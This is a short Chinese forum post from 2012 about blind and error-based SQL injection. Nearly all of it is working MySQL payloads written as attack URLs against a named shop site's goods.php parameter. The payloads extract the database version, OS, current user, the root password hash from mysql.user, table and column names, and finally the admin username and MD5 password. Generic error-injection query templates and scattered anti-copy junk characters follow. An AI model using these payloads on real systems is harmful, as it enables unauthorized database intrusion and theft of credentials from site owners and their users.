
盲注详细内容

发表于 2012-9-5 14:59:30
判断版本号
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
判断系统
3 P' b6 k4 h- Chttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23! D8 @, m8 y6 ]. D
当前 user()
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

当前 database()
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

root hash
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

当前 数据库表名
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23, {/ h& S$ w, R. `% B

当前 数据库 user_name 字段

! \9 V4 T) M) }1 ?9 T0 ^0 chttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23& y7 V6 D! _3 z  Y) d% a0 U7 ^

当前 数据库 字段 password
  r) N: H. D9 q, F: y( ghttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23  |. L/ S- }  |4 t6 c

获得 admin passwd(md5)

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23! o" a- u4 [0 {9 _+ M
报错注射
; ~; @; Z! s7 Q: ~, ISELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)+ P6 A" D% @4 }; \& G; t
" L/ q1 {1 j2 O( t# ~! |
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
# c, e5 B% b: v  ~9 _$ Tand(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)